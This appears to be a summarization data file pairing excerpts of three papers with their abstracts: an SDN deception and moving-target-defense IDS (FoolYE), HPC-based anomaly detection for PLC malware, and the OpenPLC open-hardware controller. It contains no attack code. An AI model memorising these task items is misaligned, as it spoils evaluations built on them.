For the ML-based IDS, ResNet50 and DenseNet161 are used as the prediction models. Each of them is loaded into the IDS, which is programmed in Python. The network traffic is captured and its features extracted by the TCPDUMP_and_CICFlowMeter tool [29], then sent asynchronously via RabbitMQ [30] to the ML-based IDS for classification. In addition, MTD is programmed as a module of the SDN controller.
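A minimal sketch of the moving-trap renewal, using hypothetical host and honeypot identifiers; in the real framework each new assignment would be realized by running an Ansible playbook over SSH, which is only indicated here as a comment.

```python
import random

HONEYPOTS = ["opencanary", "cowrie", "dionaea"]
DECOY_HOSTS = ["h5", "h6", "h7"]  # hypothetical decoy host names

def next_deployment(current, rng):
    """Return a fresh host->honeypot plan, always changing each host's type."""
    plan = {}
    for host in DECOY_HOSTS:
        choices = [hp for hp in HONEYPOTS if hp != current.get(host)]
        plan[host] = rng.choice(choices)
    return plan

rng = random.Random(1)
plan = {}
for _ in range(3):  # three scheduled renewal periods
    plan = next_deployment(plan, rng)
    # Here the orchestrator would run the Ansible playbook to pull the
    # chosen honeypot image and start its container on each decoy host.
```

The fixed-trap mechanism is the degenerate case where the plan is computed once and never renewed.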
Therein, real IP addresses are available to hosts but hidden from outside attackers to prevent reconnaissance attacks from the outside. In contrast, a virtual IP address is an IP representing a host, and it is changed continuously. To meet the demand for monitoring the cyber deception system and issuing notices, we utilize Snort [31] on the host VM playing the role of Security Orchestrator. Snort rules are installed to monitor network traffic sent to the cyber deception system, namely DDoS attacks and SSH connection attempts. Any security event violating the security policy established by the Snort rules produces an alert for the network security administrator.

TABLE III. COMPRESSED SIZE AND PULLED SIZE OF THE IMAGES CONTAINING THE TRAPS
#               | OpenCanary | Cowrie    | Dionaea
Compressed size | 206.67 MB  | 114.66 MB | 59.87 MB
Pulled size     | 632 MB     | 432 MB    | 194 MB

C. Experiment Results
To evaluate the built-in attack identification ability, we perform a DoS attack on a web server on service port 80 by sending 100 HTTP requests per second. For the assessment of attack detection capabilities, we use statistical methods: for every 100 records received, the ML-based IDS calculates the percentage of attack flows in the total network traffic. Approximately 60% of attack flows are detected by both the ResNet50 and DenseNet161 models in this test. Meanwhile, the average flow-record prediction rates of ResNet50 and DenseNet161 are around 1.93 records/s and 2.12 records/s, respectively. The number of records processed per second is proportional to the hardware configuration, because the recognition speed of the model is greatly affected by the CPU, RAM, and GPU of the VM. Regarding the deployment time of traps, we take 30 measurements and record the time in seconds. The experiments are performed with 2, 3, and 4 traps. For each group of traps, the results of the experiments are shown in Table IV.
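The per-batch statistic described above (the percentage of attack flows in every 100 records) can be sketched as follows; `predict` is a stand-in for the trained ResNet50/DenseNet161 classifier, and the toy batch is synthetic.

```python
def attack_percentage(records, predict):
    """Share of flows in a 100-record batch that the classifier flags."""
    assert len(records) == 100
    attacks = sum(1 for r in records if predict(r) == "attack")
    return 100.0 * attacks / len(records)

# Toy batch: 60 attack flows out of 100, mirroring the ~60% figure above.
batch = ["attack"] * 60 + ["benign"] * 40
pct = attack_percentage(batch, predict=lambda r: r)
```

In the deployed system the same computation would run on classifier outputs streamed in over RabbitMQ rather than on labels carried by the records themselves.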
The time consumption of trap deployment includes the time for host selection, pulling honeypot images from the Docker registry (storage), and starting containers for all honeypots in the group. To show the effectiveness of network monitoring on the deployed honeypots, we conduct a test case on the OpenCanary trap by logging and analyzing the attacker's actions. An adversary performs a scanning attack, obtaining the active services running on a specific host. Following that, they attempt to explore and exploit the fake target built by OpenCanary. Such trails coming from the decoys are monitored and shown in real time in the view of the Security Orchestrator machine, as depicted in Fig. 4.

TABLE IV. TIME CONSUMPTION OF HONEYPOT DEPLOYMENT IN 30 EXPERIMENTS
Number of honeypots | Maximum time (s) | Minimum time (s) | Average time (s)
2                   | 200.2            | 136.8            | 163.2
3                   | 330.5            | 159.9            | 236.7
4                   | 468.6            | 166.1            | 268.2

Fig. 4. Log monitoring from the OpenCanary honeypot.

TABLE V. TIME CONSUMPTION AND THE NUMBER OF DISCOVERED HOSTS IN THE SCANNING PROCESS WITH MTD AND WITHOUT MTD
Total hosts | MTD: Scanning time (s) | MTD: Discovered hosts | Non-MTD: Scanning time (s) | Non-MTD: Discovered hosts
8           | 5524                   | 7                     | 969                        | 8
12          | 6948                   | 9                     | 1059                       | 12
16          | 9837                   | 13                    | 1206                       | 16

Regarding the performance of the MTD mechanism in changing attack surfaces, we use the nmap tool [32] to scan the network both with and without MTD integration. The results, as illustrated in Table V, show that with the MTD strategy enforced, an attacker not only takes much longer to finish reconnaissance attacks but also misses useful network information.
V. CONCLUSION AND FUTURE WORKS
To improve the effectiveness of cyber defense in SDN-enabled networks, we introduce a deception-enhanced intrusion detection system, named FoolYE, for deploying traps and decoys to lure attackers.
By leveraging the essence of SDN, these traps are continually created, monitored, and easily changed to create more deceptive attack surfaces. With the matrix of decoys and Moving Target Defense, a network intruder is forced to spend more time and effort on counterfeit assets, while security analysts are alerted early to the attacker's presence in the network. Furthermore, the behaviors of adversaries in the decoy systems are collected for training the IDS to meet the requirements of detecting skillful cyberattacks in real-world scenarios. In the future, we intend to utilize honey patches, which turn real assets into rich-environment traps. Next, evaluation by red teams will be considered to further validate the feasibility of our framework in real-world scenarios.
ACKNOWLEDGMENT
This research is funded by Vietnam National University Ho Chi Minh City (VNU-HCM) under grant number DS2022-26-02. Phan The Duy was funded by Vingroup JSC and supported by the Domestic Master, PhD Scholarship Programme of Vingroup Innovation Foundation (VINIF), Institute of Big Data, code VINIF.2021.TS.152.
REFERENCES
[1] P. P. Ray and N. Kumar, "SDN/NFV architectures for edge-cloud oriented IoT: A systematic review," Computer Communications, vol. 169, 2021.
[2] I. Alam, K. Sharif, F. Li, Z. Latif, M. M. Karim, S. Biswas, B. Nour and Y. Wang, "A Survey of Network Virtualization Techniques for Internet of Things Using SDN and NFV," ACM Computing Surveys, 2020.
[3] W. Sun, "The Art of War," in Mens sana, Knaur, München, 2001.
[4] D. Fraunholz, S. D. Anton, C. Lipps, D. Reti, D. Krohmer, F. Pohl, M. Tammen and H. D. Schotten, "Demystifying Deception Technology: A Survey," arXiv:1804.06196, 2018.
[5] G.-l. Cai, B.-s. Wang, W. Hu and T.-z. Wang, "Moving target defense: state of the art and characteristics," Frontiers Inf Technol Electronic Eng, vol. 17, pp. 1122-1153, 2016.
[6] S. Sengupta, A. Chowdhary, A. Sabur, A. Alshamrani, D. Huang and S.
Kambhampati, "A Survey of Moving Target Defenses for Network Security," IEEE Communications Surveys & Tutorials, vol. 22, 2020.
[7] H. Wang and B. Wu, "SDN-based hybrid honeypot for attack capture," in 2019 IEEE 3rd ITNEC, 2019.
[8] N. Cifranic, R. A. Hallman, J. Romero-Mariona, B. Souza, T. Calton and G. Coca, "Decepti-SCADA: A cyber deception framework for active defense of networked critical infrastructures," Internet of Things, vol. 12, 2020.
[9] R. Dahbul, C. Lim and J. Purnama, "Enhancing Honeypot Deception Capability Through Network Service Fingerprinting," Journal of Physics Conference Series, 2017.
[10] X. Luo, Q. Yan, M. Wang and W. Huang, "Using MTD and SDN-based Honeypots to Defend DDoS Attacks in IoT," in ComComAp, 2019.
[11] D. Miao and W. Kun, "An SDN-Enabled Pseudo-Honeypot Strategy for Distributed Denial of Service Attacks in Industrial Internet of Things," IEEE Transactions on Industrial Informatics, vol. 16, 2019.
[12] M. Ge, J.-H. Cho, D. S. Kim, G. Dixit and I.-R. Chen, "Proactive Defense for Internet-of-Things: Integrating Moving Target Defense with Cyberdeception," arXiv preprint arXiv:2005.04220, 2020.
[13] A. Kanellopoulos and K. G. Vamvoudakis, "A Moving Target Defense Control Framework for Cyber-Physical Systems," IEEE Transactions on Automatic Control, vol. 65, no. 3, pp. 1029-1043, 2020.
[14] A. Frederico, A. Gbadebo, A.-N. Khaled, G. Yang, H. K. W. and K. Latifur, "Improving intrusion detectors by crook-sourcing," in ACSAC, 2019.
[15] Q. Duan, E. Al-Shaer, M. Islam and H. Jafarian, "CONCEAL: A Strategy Composition for Resilient Cyber Deception-Framework, Metrics and Deployment," in 2018 IEEE CNS, Beijing, China, 2018.
[16] T. Tang, D. McLernon, L. Mhamdi, S. Zaidi and M. Ghogho, "Intrusion Detection in SDN-Based Networks: Deep Recurrent Neural Network Approach," in Alazab M., Tang M. (eds) Deep Learning Applications for Cyber Security,
Advanced Sciences and Technologies for Security Applications, Springer, Cham, 2019.
[17] I. Sharafaldin and A. H. Lashkari, "A Detailed Analysis of the CICIDS2017 Data Set," in Communications in Computer and Information Science, vol. 977, CCIS, 2019.
[18] I. Sharafaldin, A. H. Lashkari and A. A. Ghorbani, "Toward Generating a New Intrusion Detection Dataset and Intrusion Traffic Characterization," in 4th ICISSP, Portugal, 2018.
[19] Z. Li, Z. Qin, K. Huang, X. Yang and S. Ye, "Intrusion Detection Using Convolutional Neural Networks for Representation Learning," in Lecture Notes in Computer Science, vol. 10638, LNCS.
[20] "Docker Registry," [Online]. Available: https://docs.docker.com/registry/.
[21] "PyTorch," [Online]. Available: https://pytorch.org/.
[22] "Ryu SDN Controller," [Online]. Available: https://ryu-sdn.org/.
[23] "Containernet: Use Docker containers as hosts in Mininet emulations," [Online]. Available: https://containernet.github.io/.
[24] "An Instant Virtual Network on your Laptop (or other PC)," Mininet, [Online]. Available: http://mininet.org/.
[25] "OpenCanary," [Online]. Available: https://opencanary.readthedocs.io/en/latest/.
[26] "Cowrie," [Online]. Available: https://cowrie.readthedocs.io/en/latest/index.html.
[27] "Dionaea honeypot," [Online]. Available: https://dionaea.readthedocs.io/.
[28] "Playbook in Ansible," [Online]. Available: https://docs.ansible.com/ansible/latest/user_guide/playbooks_intro.html.
[29] "TCPDUMP_and_CICFlowMeter," [Online]. Available: https://github.com/iPAS/TCPDUMP_and_CICFlowMeter.
[30] "RabbitMQ," RabbitMQ || VMware, Dec 2020. [Online]. Available: https://www.rabbitmq.com/.
[31] "Snort - Network Intrusion Detection & Prevention System," [Online]. Available: https://www.snort.org/.
[32] "Nmap: the Network Mapper - Free Security Scanner," [Online]. Available: https://nmap.org/.
Summary:
The adoption of deception technology, constructed to divert stealthy attackers from real assets and gather intelligence about how they operate, is gaining ground in network systems. Often, static honeypots are deployed in the network to attract adversaries and keep them from accessing the real targets. This leads to a disclosure of the existence of cyber traps in the network, which does not fool skillful attackers. Meanwhile, many intrusion detection systems (IDS) lack the abnormal traffic samples needed to obtain knowledge of cyberattacks. Hence, it is vital to make honeypots more dynamic and to provide the material for harvesting useful threat intelligence for the detector. Taking advantage of Software Defined Networking (SDN), cyber traps can be easily deployed when an intrusion detector triggers, or actively laid in advance to mitigate the impact of adversaries on real assets. Instead of building the IDS separately or blocking attacks promptly after an alert is issued, in this paper we utilize the strategy of associating Cyber Deception and Moving Target Defense (MTD) with an IDS in SDN, named FoolYE (Fool your enemies), to slow a network intruder down and leverage the behaviors of adversaries on traps to feed back into detector awareness.
|
Summarize:
Index Terms — Anomaly detection, cyber security, programmable logic controller, malware, resilient control.
I. INTRODUCTION
CYBER-SECURITY for cyber-physical systems (CPS) and industrial control systems (ICS) is becoming increasingly important [1]-[3]. Several attacks on CPS/ICS have been reported [4]-[14]. While general-purpose computer and network security approaches apply to CPS, leveraging the temporal behavior and code structure characteristics of CPS devices can offer complementary solutions. We present a lightweight (i.e., zero-hardware-cost) method for malware characterization and detection in CPS devices using the Hardware Performance Counters (HPCs) digital side channel. HPCs are special-purpose registers embedded in almost all processors (including Intel, ARM, and PowerPC) and count hardware events such as the number of instructions retired, the number of branches taken, and other low-level processor events of applications running on the processor. HPCs provide in-depth performance information on software without modifying the source code. The specific HPCs available depend on the particular processor architecture.
Manuscript received January 17, 2019; revised May 28, 2019; accepted May 29, 2019. Date of publication June 17, 2019; date of current version September 24, 2019. This work was supported in part by the U.S. Office of Naval Research under Grant N00014-15-1-2182 and Grant N00014-17-1-2006 and in part by the Defense Advanced Research Projects Agency under Air Force Research Laboratory (AFRL) Contract FA8750-16-C-0179. The associate editor coordinating the review of this manuscript and approving it for publication was Prof. Chip-Hong Chang. (Corresponding author: Prashanth Krishnamurthy.) The authors are with the Department of Electrical and Computer Engineering, NYU Tandon School of Engineering, Brooklyn, NY 11201 USA (e-mail: prashanth.krishnamurthy@nyu.edu; rkarri@nyu.edu; khorrami@nyu.edu). Digital Object Identifier 10.1109/TIFS.2019.2923577
HPC measurements are accumulated over the time intervals between successive readings. A time series of HPC measurements offers a temporal profile of the code being executed. Given a known-good embedded device, the HPC time series characterizes the expected temporal characteristics of the code on the embedded processor when it is running the expected code. This paper develops a lightweight method (Figure 1) to detect anomalies using machine learning classification of real-time HPC measurements. While this implementation considers HPC measurements via software on the embedded device, HPC measurements can also be relayed onto a digital output and remotely collected. This can be done by a kernel module on the device or a dedicated hardware port. One motivation of this study is to demonstrate the efficacy of HPC-based monitoring of real-time embedded processes and make a case for hardware support for continuous HPC monitoring in next-generation processors. A monitor can be interfaced to the embedded processor via a dedicated hardware port to enable arms-length monitoring.
A. Key Contributions and Novelty of the Approach
This paper presents real-time anomaly detection in multi-threaded processes (e.g., controller, sensor processing, and sensor fusion implementations) in embedded PLCs. Features extracted from the multidimensional HPC time series of the target process are classified using machine learning to detect mismatches between observed and baseline temporal behavior. Time series of HPC measurements collected from the device under known-good conditions are used, without requiring anomalous data. The trained anomaly detector detects malware/modifications that have not been seen before. The approach is applied to controllers running in a PLC in a HITL testbed of an ICS. We show that several modifications can be detected using the approach.
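As a hedged illustration of this monitoring idea, the sketch below groups a toy HPC time series into sliding windows and labels each window baseline or anomalous. The threshold rule is a deliberate simplification standing in for the paper's machine learning classifier, and the counts are synthetic.

```python
def sliding_windows(samples, size, step):
    """Yield fixed-size windows over the HPC sample series."""
    for start in range(0, len(samples) - size + 1, step):
        yield samples[start:start + size]

def classify(window, baseline_mean, tol):
    """Placeholder classifier: flag windows whose mean drifts off baseline."""
    mean = sum(window) / len(window)
    return "baseline" if abs(mean - baseline_mean) <= tol else "anomalous"

# Toy series of instructions-retired counts, with a burst mid-stream.
series = [100, 102, 98, 101, 250, 255, 260, 99, 100, 101]
labels = [classify(w, baseline_mean=100, tol=10)
          for w in sliding_windows(series, size=2, step=2)]
```

The per-window labels over successive windows, rather than any single reading, are what give the detector robustness to execution-time variability.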
While HPC-based anomaly detection has been considered in prior works (e.g., [15]-[29]; see Section I-B: Related Work), a crucial novelty of the proposed approach is that the primary focus is on real-time multithreaded processes on embedded devices in CPS and on enabling continuous monitoring of time series of multi-thread HPC readings of such real-time processes. For this purpose, novel aspects of the proposed approach include:
1556-6013 © 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
KRISHNAMURTHY et al.: ANOMALY DETECTION IN REAL-TIME MULTI-THREADED PROCESSES
Fig. 1. Overall structure of the machine learning based malware detection and characterization system.
- An algorithmic methodology that applies to multi-threaded processes wherein the multiple threads could run with vastly different load characteristics and could have a mix of timing-based and event-triggered/interrupt-driven components. Multi-threaded processes are typical in real-time embedded controllers. For example, control implementations on PLCs typically use separate threads for analog and digital inputs, for network communication with other PLCs and human-machine interfaces (HMI), and for user-defined control algorithms.
- An approach to detect malware (or unexpected modifications of the target process) that was not previously seen. The approach does not require malware signatures and uses known-good data from baseline device operation.
- A blackbox ("outside-the-process") approach to real-time monitoring of unmodified processes for which source code is unavailable. HPC measurements are collected by a separate process using kernel-level methods.
The monitored process is not instrumented and hence its operation remains unmodified. By using a machine learning based time-series classifier, the approach is oblivious to the structure of the process. The anomaly detector uses time windows of the HPC measurements without assuming timing synchronization, and hence does not require temporal alignment of the HPC measurement time series with any internal structure of the process.
- The anomaly detector considers the multi-threaded structure of the target process. The HPCs for each thread are measured separately at each sampling instant to create a vector of HPC measurements for each thread. The matrix generated from these HPC sensor measurement vectors over a sliding window of time is used as a multidimensional HPC sensor input to extract low-dimension features. Feature extraction considers per-thread and cross-thread features. While per-thread features model activity patterns within the threads, cross-thread features model temporal relationships among activity patterns between threads.
B. Related Work
Cyber-security of CPS has been addressed in several works (e.g., [1]-[3] and
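The per-thread and cross-thread feature extraction outlined above can be sketched as follows. The specific features chosen here (per-thread mean and standard deviation, pairwise mean ratios across threads) are illustrative assumptions, not the paper's exact feature set.

```python
from statistics import mean, pstdev

def extract_features(window):
    """window: dict mapping thread name -> list of HPC counts in the window."""
    feats = {}
    # Per-thread features: summarize activity within each thread.
    for name, series in window.items():
        feats[f"{name}_mean"] = mean(series)
        feats[f"{name}_std"] = pstdev(series)
    # Cross-thread features: relate activity patterns between thread pairs.
    names = sorted(window)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            feats[f"{a}_over_{b}"] = mean(window[a]) / max(mean(window[b]), 1e-9)
    return feats

# Toy window: one HPC count per sampling instant for two threads.
window = {"io_thread": [10, 12, 11], "control_thread": [20, 22, 24]}
feats = extract_features(window)
```

The resulting low-dimension feature vector, one per sliding window, is what the time-series classifier consumes.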
Summary:
We propose a novel methodology for real-time monitoring of software running on embedded processors in cyber-physical systems (CPS). The approach uses real-time monitoring of hardware performance counters (HPCs) and applies to multi-threaded and interrupt-driven processes typical in programmable logic controller (PLC) implementations of real-time controllers. The methodology uses a black-box approach to profile the target process using HPCs. The time series of HPC measurements over a time window under known-good operating conditions is used to train a machine learning classifier. At run-time, this trained classifier classifies the time series of HPC measurements as baseline (i.e., probabilistically corresponding to a model learned from the training data) or anomalous. The baseline versus anomalous labels over successive time windows offer robustness against the stochastic variability of code execution on the embedded processor and detect code modifications. We demonstrate the effectiveness of the approach on an embedded PLC in a hardware-in-the-loop (HITL) testbed emulating a benchmark industrial process. In addition, to illustrate the scalability of the approach, we also apply the methodology to a second PLC platform running a representative embedded control process.
|
Summarize:
Keywords — PLC; OpenPLC; Automation; MODBUS; Open source
I. INTRODUCTION
In the early 60s, industrial automation was usually composed of electromechanical parts like relays, cam timers, and drum sequencers. They were interconnected in electrical circuits to perform the logical control of a machine. Changing a machine's logic meant intervening in its electrical circuit, which was a long and complicated process. In 1968, the Hydra-Matic division of General Motors requested proposals for an electronic replacement for hard-wired relay systems. The winning proposal came from Bedford Associates with their 084 project. The 084 was a digital controller made to be tolerant of plant-floor conditions, and was later known as a Programmable Logic Controller, or simply PLC [1]. Within a few years, the PLC started to spread all over the automotive industry, replacing relay logic machines as an easier and cheaper solution, and becoming a standard for industrial automation.
There is a strict relation between automation and development. In less developed countries, the greatest barriers are knowledge and cost. Industrial controllers are still very expensive, and companies don't provide detailed information about how these controllers work internally, as they are all closed source. The OpenPLC was created to break these two barriers, as it is fully open source and open hardware. This means that anyone can have access to all project files and information for free. This kind of project helps spread technology and knowledge to the places that need it the most. Also, the OpenPLC is made with inexpensive components to lower its cost, opening doors to automation where it wasn't ever possible before.
II. THE PLC ARCHITECTURE
The PLC, being a digital controller, shares common terms with typical PCs, like CPU, memory, bus, and expansion. But there are two aspects of the PLC that differentiate it from standard computers.
The first is that its hardware must be sturdy enough to survive a rugged industrial atmosphere. The second is that its software must be real time.
A. Hardware
With the exception of Brick PLCs, which are not modular, the hardware of a usual PLC can be divided into five basic components:
- Rack
- Power supply
- CPU [Central Processing Unit]
- Inputs
- Outputs
Like a human spine, the rack has a backplane at the rear allowing communication between every PLC module. The power supply plugs into the rack, providing regulated DC power to the system. The CPU is probably the most important module of a PLC. It is responsible for processing the information received from the input modules and, according to the programmed logic, sending impulses to the output modules. The CPU holds its program in permanent storage and uses volatile memory to perform operations. The logic stored in the CPU's memory is continuously processed in an infinite loop. The time needed to complete a cycle of this infinite loop is called the scan time. A faster CPU can achieve a shorter scan time.
Input modules are used to read the signals of sensors installed in the field. There are many types of input modules, depending on the sensor to be read, but they can generally be split into two categories: analog and digital. Digital input modules handle discrete signals, generated by devices that are either on or off. Analog input modules convert a physical quantity to a digital number that can be processed by the CPU. This conversion is usually made by an ADC [Analog to Digital Converter] inside the analog input module. The type of the physical quantity to be read determines the type of the analog input module. For example, depending on the sensor, the physical value can be expressed in voltage, current, resistance, or capacitance. Similarly to the input modules, output modules can control devices installed in the field.
Digital output modules can control devices as if by on-off switches. Analog output modules can send different values of voltage or current to control position, power, pressure, or any other physical parameter. As the most significant feature of a PLC is robustness, each module must be designed with protections such as short-circuit, over-current, and over-voltage protection. It is also important to include a filter against RF noise.
B. Software
PCs, by design, are made to handle different tasks at the same time. However, they have difficulty handling real-time events. To have effective control, PLCs must be real time. A good definition of real time is "any information processing activity or system which has to respond to externally generated input stimuli within a finite and specified period" [2]. Real-time systems don't necessarily need to be fast; they just need to give an answer before the specified period known as the deadline. Systems without real-time facilities cannot guarantee a response within any timeframe. The deadline of a PLC is its scan time, so all responses must be given before or at the moment the scan reaches the end of the loop.
There are many accepted languages to program a PLC, but the most widely used is called ladder logic, which follows the IEC 61131-3 standard [3]. Ladder logic (see Fig. 1) was originally created to document the design and construction of relay logic circuits. The name came from the observation that these diagrams resemble ladders, with two vertical bars representing rails and many horizontal rungs between them.
978-1-4799-7193-0/14/$31.00 © 2014 IEEE — IEEE 2014 Global Humanitarian Technology Conference
These electrical schematics evolved into a programming language right after the creation of the PLC, allowing technicians and electrical engineers to develop software without additional training in a computer language such as C, BASIC, or FORTRAN.
Fig. 1. Example of a ladder logic diagram.
Every rung in the ladder logic represents a rule for the program. When implemented with relays and other electromechanical devices, all the rules execute simultaneously. However, when the diagram is implemented in software using a PLC, every rung is processed sequentially in a continuous loop (scan). The scan is composed of three phases: 1) reading inputs, 2) processing ladder rungs, 3) activating outputs. To achieve the effect of simultaneous and immediate execution, the outputs are all toggled at the same time at the end of the scan cycle.
III. THE OPENPLC HARDWARE ARCHITECTURE
The OpenPLC (see Fig. 2) was created based on the architecture of actual PLCs on the market. It is a modular system with expansion capabilities, an RS-485 bus for communication between modules, and hardware protections. To create the first OpenPLC prototype, four boards were built:
- Bus Board
- CPU Card
- Input Card
- Output Card
Fig. 2. The OpenPLC prototype.
A. Bus Board
The bus board acts like a rack, with an integrated 5 VDC power supply. Each module connects to the bus board through a DB-25 connector. The communication between modules is made over an RS-485 bus, whose lines are on the bus board. Caution was taken, while routing the RS-485 lines, to avoid communication problems. Fig. 3 shows the pins and connections of each slot of the bus board. The 24 V and RS-485 grounds were separated from the rest of the circuit ground to isolate short circuits on these lines. To allow more current to flow through the power lines, the respective pins were duplicated.
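The three-phase scan described earlier (read inputs, process every rung sequentially, toggle all outputs together at the end of the cycle) can be sketched as a hypothetical illustration; the rung shown is a toy rule, not OpenPLC firmware.

```python
def scan_cycle(read_inputs, rungs, write_outputs):
    """One PLC scan: snapshot inputs, evaluate rungs, then commit outputs."""
    inputs = read_inputs()          # phase 1: read inputs once
    outputs = {}
    for rung in rungs:              # phase 2: process ladder rungs in order
        outputs.update(rung(inputs))
    write_outputs(outputs)          # phase 3: toggle all outputs together
    return outputs

# Toy logic: one rung energizes a motor when both start and guard are on.
rungs = [lambda i: {"motor": i["start"] and i["guard"]}]
result = scan_cycle(lambda: {"start": True, "guard": True},
                    rungs,
                    lambda outs: None)
```

Deferring all output writes to phase 3 is what gives the programmer the illusion that every rung fires simultaneously, as in the original relay circuits.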
Three pins were used for the physical address, so that a module connected to a particular slot would know its physical position on the bus board. These pins were called D0, D1, and D2, and were hardcoded with logic 1 or 0 in a binary sequence, creating different numbers from 0 to 7, one number for each slot.
Fig. 3. Bus board DB-25 connections.
B. CPU Card
The OpenPLC's brain is the CPU card. It was important to use a processor that was inexpensive, fast enough to handle all PLC operations, and, most importantly, actively supported by the open source community. After some research, the processor selected was the AVR ATmega2560. This microcontroller is a high-performance, low-power Atmel 8-bit AVR RISC-based microcontroller that combines 256 KB ISP flash memory, 8 KB SRAM, 4 KB EEPROM, 86 general-purpose I/O lines, 32 general-purpose working registers, a real-time counter, six flexible timer/counters with compare modes, PWM, 4 USARTs, a byte-oriented 2-wire serial interface, a 16-channel 10-bit A/D converter, and a JTAG interface for on-chip debugging. The device achieves a throughput of 16 MIPS at 16 MHz and operates between 4.5 and 5.5 volts [4]. The biggest reason for this choice was that the ATmega2560 is used in the Arduino family [5], a large open source community for rapid electronic prototyping with an advanced programming language called Wiring. By using this processor we made the OpenPLC compatible with Arduino code, including hundreds of libraries written for it. The CPU card also includes another important IC (Integrated Circuit), the Wiznet W5100, responsible for Ethernet communication. The Wiznet W5100 supports hardwired TCP/IP protocols like TCP, UDP, ICMP, IPv4, ARP, IGMP, PPPoE, and Ethernet 10BaseT/100BaseTX, has 16 KB of internal memory for Tx/Rx buffers, and accepts a serial (over SPI) or parallel interface.
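The D2..D0 slot-address scheme can be illustrated with a small decode sketch; the helper is hypothetical, not OpenPLC firmware, and simply shows how three hardcoded pins yield addresses 0 through 7.

```python
def slot_address(d2, d1, d0):
    """Combine the three hardcoded address pins into a slot number (0-7)."""
    return (d2 << 2) | (d1 << 1) | d0

# Enumerate every pin combination: eight distinct slot addresses.
addresses = [slot_address(d2, d1, d0)
             for d2 in (0, 1) for d1 in (0, 1) for d0 in (0, 1)]
```

For example, a slot with D2=1, D1=0, D0=1 hardwired reads its position as slot 5.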
This is also the official IC of the Arduino Ethernet Shield, enabling us to reuse all the code written for it on the OpenPLC. In order to communicate with the PC and download programs, the OpenPLC uses a USB port. The FT232RL from FTDI Devices converts the serial Rx/Tx lines to the USB standard. The Arduino Mega bootloader is used to upload code to the CPU over the USB circuit.
C. Input Card
The Input card is a digital input module for the OpenPLC. To process the digital inputs read by the signal conditioning circuit and send them to the CPU card, the input card uses the AVR ATmega328P, a microcontroller with the same core as the CPU card. This made it possible to reuse parts of the code written for the CPU card, especially code related to communication over the RS-485 bus. The input signal conditioning circuit is composed mainly of an optocoupler, used to isolate the input signals from the control signals. The circuit of each input can be seen in Fig. 4. When a stimulus is applied between E1+ and E1-, a current flows through the input resistor and activates the internal LED of the optocoupler. The photons emitted by the internal LED are sensed by the phototransistor, which creates a path for the current from 5 VDC to ground, sending logic 0 to the inverter's input. As the inverter inverts the logic signal, a logic 1 is received by the microcontroller, indicating that a digital stimulus was applied at the input. The input card has 8 isolated input circuits, so each module can read up to 8 digital signals at the same time. The state of each input is sent to the CPU card, over the RS-485 bus, to be processed according to the ladder logic.
Fig. 4. Isolated input circuit from the Input card.
D. Output Card
Each Output card has 8 relay-based outputs, driving up to 8 loads at the same time. It has double-isolated outputs, as they are isolated by an optocoupler (just like the Input card) and by the relay itself, which gives an additional layer of isolation. Fig.
5 shows the circuit of one isolated output from the Output card. As digital processors are better at sinking current than sourcing it, the cathode of the optocoupler's internal LED is connected to an output pin on the ATmega328P. While the output pin remains at logic 1, no current flows through the LED. If the output pin goes to logic 0, a current is drawn through that pin, activating the optocoupler's internal LED. The internal phototransistor is connected to an external BC817 transistor in a Darlington configuration to increase gain. When photons are sensed by the internal phototransistor, both transistors are polarized, energizing the relay's coil. Without photons, no current flows through the coil, and the relay remains off.

Fig. 5. Isolated output circuit from the Output Card

E. Protections

There are five types of protection used in the OpenPLC circuit:
- Current limiting protection with PPTC [Polymeric Positive Temperature Coefficient]
- Over-voltage protection with TVS [Transient Voltage Suppression diode]
- Ground isolation
- Reverse polarity protection
- Noise filters

Every input and output (including the power input at the Bus board) has protection against over-voltage and short circuit. These protections are achieved by using a PPTC in series with the circuit input and a TVS diode in parallel. When a high current flows through the PPTC, it reaches a high resistance with a low holding current, protecting the circuit in series with it. When the current is removed, it cycles back to a conductive state, enabling the circuit to work properly. Optocouplers and relays were used to isolate high power circuits from the control logic. The filled zones were connected to ground and only the low power zones of the board were filled. To isolate the communication and 24V grounds from the filled zone, zero ohm resistors were used.
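Going back to the output stage of Fig. 5, its active-low drive reduces to a small truth table, modelled below. This is a behavioural sketch with illustrative names, not actual OpenPLC firmware:

```python
# Behavioural sketch of the Fig. 5 output stage: the ATmega328P pin sinks
# current at logic 0, lighting the optocoupler LED; the phototransistor and
# the external BC817 (Darlington pair) then energize the relay coil.

def relay_energized(output_pin: int) -> bool:
    led_on = (output_pin == 0)      # current is drawn only when the pin sinks
    darlington_on = led_on          # photons polarize both transistors
    return darlington_on            # coil current -> relay switches on
```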
To protect against reverse polarity on the inputs, diodes were connected in series to allow current flow in only one direction. Also, capacitors were connected in parallel to ground to filter noise from sensitive devices.

IV. THE OPENPLC SOFTWARE ARCHITECTURE

What differentiates a PLC from any other robust digital controller is its ability to be programmed in standardized languages. According to [3], the IEC 61131-3 standard defines five languages in which PLCs can be programmed:
- FBD [Function Block Diagram]
- Ladder Diagram
- Structured Text
- Instruction List
- SFC [Sequential Function Chart]

The most widely used PLC language is the Ladder Diagram. PLCs from different manufacturers might not have all five programming languages available, but they certainly have the Ladder Diagram as one of the options. For this reason, it was important to develop a software tool able to compile a ladder diagram into code that could be understood by the CPU of the OpenPLC. The solution was partially based on LDmicro [6], an open source ladder editor, simulator and compiler for 8-bit microcontrollers. It generates native code for Atmel AVR and Microchip PIC16 CPUs from a ladder diagram. Unfortunately, the OpenPLC CPU uses the ATmega2560, which is not supported by the original LDmicro software. Also, the generated code contains only the ladder logic converted to assembly instructions. The OpenPLC has many other functions to perform, such as communication over Ethernet for MODBUS-TCP supervisory systems, RS-485 and USB, control of the individual modules, error message generation and so on. For this reason, it was necessary to create an intermediate step before the final compilation, in which the ladder diagram had to be combined with the OpenPLC firmware. This way, the final program contains both the ladder logic and the OpenPLC functions. One of the outputs generated by LDmicro for the Ladder Diagram was ANSI C code.
